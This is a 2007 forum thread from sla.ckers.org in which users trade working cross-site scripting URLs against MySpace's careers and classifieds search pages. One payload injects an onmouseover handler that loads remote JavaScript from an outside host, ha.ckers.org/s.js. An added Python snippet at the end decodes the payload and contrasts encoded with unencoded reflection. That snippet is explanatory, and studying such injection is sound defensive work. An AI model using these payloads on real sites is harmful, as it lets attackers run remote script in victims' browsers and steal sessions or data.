Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Myspace exploit ^7
Posted by: Lockdown
Date: January 14, 2007 11:18PM

Thanks to Malorn for the starting place

http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl+%27&location=%22+onmouseover%3D%22alert%28%27xss%27%29%3B&special=&sb=&startIndex=0

We win. Again.

http://sads.myspace.com/index.cfm?fuseaction=careers.search&keywords=lawl&location=%22+onmouseover%3D%22alert%28%27Lockdown%20LOL%27%29%3Bvar+scElem+%3D+%27scri%27%2B%27pt%27%3Bx%3Ddocument.createElement%28scElem%29%3Bx.src%3D%27http%3A%2F%2Fha.ckers.org%2Fs.js%27%3Bdocument.body.appendChild%28x%29%3B%22&special=&sb=rel&startIndex=0

I'd like to give props to Whiteacid, digi7al64, and r0xes for being my hero.



Edited 1 time(s). Last edit at 01/14/2007 11:40PM by Lockdown.

Re: Myspace exploit ^7
Posted by: eyeced
Date: January 15, 2007 10:52AM

This isn't ^7. The posts were started (by me, actually) for non-alpha non-digit exploits in myspace, not url exploits. Maluc has posted exploits in the urls, in "So it begins". Personally I don't think this falls into the ^7 category. Nice exploit nevertheless.

Re: Myspace exploit ^7
Posted by: trev
Date: January 18, 2007 10:33PM

http://classifieds.myspace.com/index.cfm?fuseaction=classifieds.searchCategory&keyword=%22%3E%3Cbody+onmouseover%3Cscript%3D%22alert%28%27XSS%27%29 looks more like it.

Re: Myspace exploit ^7
Posted by: rsnake
Date: January 22, 2007 12:25PM

Nice find, Trev!

- RSnake
Gotta love it. http://ha.ckers.org



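An added example, not part of any post in the thread: it decodes the `location` parameter from the first URL above and reflects it into a double-quoted attribute with and without HTML attribute encoding, then parses the result to see whether an event-handler attribute appeared. The `<input>` template and all function names are assumptions; the thread does not show the site's actual markup.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# First URL from the thread, copied verbatim.
URL = ("http://sads.myspace.com/index.cfm?fuseaction=careers.search"
       "&keywords=lawl+%27"
       "&location=%22+onmouseover%3D%22alert%28%27xss%27%29%3B"
       "&special=&sb=&startIndex=0")

# Assumed template: the thread does not show the real markup.
TEMPLATE = '<input type="text" name="location" value="{}">'


def location_param(url):
    """Return the URL-decoded 'location' query parameter."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["location"][0]


def render_unsafe(value):
    """Reflect the value into the attribute with no encoding."""
    return TEMPLATE.format(value)


def render_safe(value):
    """Reflect the value with HTML attribute encoding (quotes included)."""
    return TEMPLATE.format(escape(value, quote=True))


class _Attrs(HTMLParser):
    def __init__(self):
        super().__init__()
        self.found = {}

    def handle_starttag(self, tag, attrs):
        self.found.update(attrs)


def attributes(markup):
    """Parse markup with the standard-library HTML parser; return its attrs."""
    parser = _Attrs()
    parser.feed(markup)
    parser.close()
    return parser.found


def has_event_handler(markup):
    """True if the parsed markup carries any on* event-handler attribute."""
    return any(name.startswith("on") for name in attributes(markup))
```

With encoding applied, the parser sees the whole decoded string as the `value` attribute; without it, the leading quote closes `value` and `onmouseover` becomes an attribute of its own.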